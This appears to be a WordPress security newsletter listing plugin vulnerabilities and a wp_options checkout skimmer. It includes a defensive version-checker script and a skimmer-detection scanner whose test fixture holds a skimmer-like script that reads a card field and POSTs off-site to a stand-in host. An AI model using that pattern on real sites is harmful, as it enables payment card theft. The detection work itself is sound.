There are critical security patches for two popular plugins this issue, alongside high-risk vulnerabilities in several lesser-used plugins and a theme.

There’s also new malware targeting e-commerce checkout pages, and tips from our blog on securing WordPress forms.

The plugins below have extremely high severity vulnerabilities.

GiveWP Plugin
PHP Object Injection; 9.8/10; Update to v3.19.4+

Modula Image Gallery Plugin
Arbitrary File Upload; 9.1/10; Update to v2.11.11+

Editor Comment
It’s worth taking a few minutes each week to perform a site review to catch issues early and, wherever possible, use ShieldPRO’s auto-upgrade feature for vulnerable plugins.

The following widely used plugins carry lower-severity vulnerabilities, but because they are installed on a significant number of sites they still deserve prompt attention.

Orbit Fox by ThemeIsle Plugin
XSS; 6.5/10; Update to v2.10.44+

DearFlip Plugin
XSS; 6.5/10; Update to v2.3.53+

Essential Blocks for Gutenberg Plugin
XSS; 5.9/10; Update to v5.1.1+

InfiniteWP Client
Directory Traversal; 5.3/10; Update to v1.13.1+

Post Duplicator Plugin
Broken Access Control; 5.3/10; Update to v2.37+

Post SMTP Plugin
Broken Access Control; 4.3/10; Update to v2.9.12+

The plugins and theme below may have lower usage, but they carry extremely high risks; one has been removed from wp.org with no fix available.

WordPress File Upload Plugin
RCE; 10/10; Update to v4.25.0+

AdForest Theme
Privilege Escalation; 10/10; Update to v5.1.7+

SKT Page Builder Plugin
Arbitrary File Upload; 9.9/10; Update to v4.8+

WebinarPress Plugin
Broken Access Control; 9.9/10; Update to v1.33.25+

Post Grid Master Plugin
Local File Inclusion; 9.8/10; Removed from wp.org; no fix available; remove or replace.

Cost Calculator Builder Pro Plugin
SQL Injection; 9.1/10; Update to v3.2.16+

Garden Gnome Package Plugin
Arbitrary File Upload; 9.1/10; Update to v2.4.0+

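As an added example (not code from this newsletter or from Shield), the script below turns the "site review" into a repeatable check: it reads the output of `wp plugin list --fields=name,status,version --format=csv` and reports every plugin still below the minimum fixed version from the advisories above. The wp.org plugin slugs in the table are my assumptions and should be verified against your own install; the sample CSV is constructed, not taken from a real site.

```python
import csv
import io
import re
from typing import Dict, Iterable, List, Tuple

# Minimum fixed version per plugin slug, taken from the advisories in this issue.
# The slugs are assumed wp.org directory names; the page only gives display names.
FIXED_VERSIONS: Dict[str, str] = {
    "give": "3.19.4",                       # GiveWP, PHP Object Injection
    "modula-best-grid-gallery": "2.11.11",  # Modula Image Gallery, Arbitrary File Upload
    "themeisle-companion": "2.10.44",       # Orbit Fox, XSS
    "iwp-client": "1.13.1",                 # InfiniteWP Client, Directory Traversal
    "post-duplicator": "2.37",              # Post Duplicator, Broken Access Control
    "post-smtp": "2.9.12",                  # Post SMTP, Broken Access Control
    "wp-file-upload": "4.25.0",             # WordPress File Upload, RCE
}


def parse_version(v: str) -> Tuple[int, ...]:
    """Turn '3.19.4' (or '2.37-beta1') into a tuple of ints for numeric comparison,
    so that 3.19.10 sorts after 3.19.4 instead of before it as a string would."""
    return tuple(int(x) for x in re.findall(r"\d+", v))


def is_older(installed: str, fixed: str) -> bool:
    """True when installed < fixed. Pads the shorter tuple so 2.37 == 2.37.0."""
    a, b = parse_version(installed), parse_version(fixed)
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)) < b + (0,) * (n - len(b))


def vulnerable_plugins(csv_text: str) -> List[Dict[str, str]]:
    """Parse WP-CLI's CSV plugin listing and return rows below the fixed version.
    Inactive plugins are reported on purpose: their files stay on disk and may
    still be reachable by direct request."""
    findings: List[Dict[str, str]] = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        fixed = FIXED_VERSIONS.get(row["name"])
        if fixed and is_older(row["version"], fixed):
            findings.append({
                "name": row["name"],
                "installed": row["version"],
                "status": row["status"],
                "fixed_in": fixed,
            })
    return findings


# Constructed sample of `wp plugin list --fields=name,status,version --format=csv`;
# not output from a real site.
SAMPLE_CSV = """name,status,version
give,active,3.19.3
modula-best-grid-gallery,active,2.11.11
post-smtp,inactive,2.9.10
akismet,active,5.3
"""

if __name__ == "__main__":
    for f in vulnerable_plugins(SAMPLE_CSV):
        print(f"{f['name']} {f['installed']} ({f['status']}) -> update to {f['fixed_in']}+")
```

On a real site, pipe the WP-CLI output into the script instead of the sample. Plugins not in the table are ignored rather than reported as safe, so keep the table current as new advisories arrive.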
#4 – WordPress Checkout Pages Compromised

A new credit card skimmer targets WordPress checkout pages by injecting malicious JavaScript into the wp_options table, so the code is served from the database rather than from a file on disk and is easy to miss in a file-only scan. It creates fake payment forms or intercepts real ones to capture card details during checkout. The script activates only on pages whose URL contains “checkout”, which keeps it quiet elsewhere on the site, and it mimics legitimate payment processors such as Stripe.

It’s crucial to perform a site review to find and remove the injected code, and to close the entry point so it cannot return.
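As an added example (not code from this newsletter or from Shield), the scanner below applies a few heuristics to rows exported from wp_options and flags values that look like a checkout skimmer: an inline script that keys on “checkout” in the URL, decodes base64, touches card fields, or sends data off-site. The indicators and the sample rows are my own constructions; the page does not say which option the malware used, so the sample places it in a widget option as an assumption.

```python
import re
from typing import Dict, Iterable, List, Tuple

# Heuristic indicators for skimmer-style JavaScript hidden in wp_options values.
# These are assumed, illustrative patterns; tune them against your own sites.
INDICATORS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("inline script tag", re.compile(r"<script\b", re.I)),
    ("URL check for checkout page",
     re.compile(r"(location\.(href|pathname)|document\.URL)[^;]{0,80}checkout", re.I)),
    ("base64 decoding", re.compile(r"\batob\s*\(", re.I)),
    ("payment form fields", re.compile(r"(card[_-]?number|cvv|cvc|expir)", re.I)),
    ("exfiltration call",
     re.compile(r"\b(fetch|XMLHttpRequest|navigator\.sendBeacon|new\s+Image)\b", re.I)),
]


def scan_option(option_name: str, option_value: str) -> List[str]:
    """Return the names of every indicator that fires on one wp_options row."""
    return [name for name, rx in INDICATORS if rx.search(option_value)]


def scan_wp_options(rows: Iterable[Tuple[str, str]], min_hits: int = 2) -> Dict[str, List[str]]:
    """Scan (option_name, option_value) pairs and report rows with >= min_hits indicators.
    Requiring two hits keeps a lone legitimate <script> (analytics, tag managers)
    from being flagged on its own."""
    findings: Dict[str, List[str]] = {}
    for name, value in rows:
        hits = scan_option(name, value)
        if len(hits) >= min_hits:
            findings[name] = hits
    return findings


# Constructed sample rows standing in for a wp_options dump; not real captured malware.
SAMPLE_ROWS: List[Tuple[str, str]] = [
    ("siteurl", "https://example.com"),
    # A benign widget that legitimately embeds a script tag (should not be flagged).
    ("widget_text",
     '{"2":{"text":"<script src=\\"https://www.googletagmanager.com/gtag/js\\"></script>"}}'),
    # A skimmer-like payload: checkout URL check, base64 decode, card field, off-site POST.
    ("widget_block",
     "<script>if(location.href.indexOf('checkout')!==-1){"
     "var p=atob('Zm9ybQ==');document.querySelector('[name=card_number]');"
     "fetch('https://example.invalid/c',{method:'POST',body:p})}</script>"),
]

if __name__ == "__main__":
    for name, hits in scan_wp_options(SAMPLE_ROWS).items():
        print(f"{name}: {', '.join(hits)}")
```

Feed it rows exported from the live table (WP-CLI or a database client) and review every hit by hand: the heuristics are a triage aid, not proof of compromise, and the real cleanup still means removing the injected option value and finding how it was written.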

More Info →

#5 – Our blog: Create and Secure WordPress Forms in 3 Easy Steps

Forms are a key way users interact with WordPress sites, but they are also a frequent target for attackers. Learn how to protect them easily and improve your site’s overall security, ensuring a safer experience for your users.

More Info →

Thanks for reading, and have a wonderful week!

Paul Goodchild
Shield Security for WordPress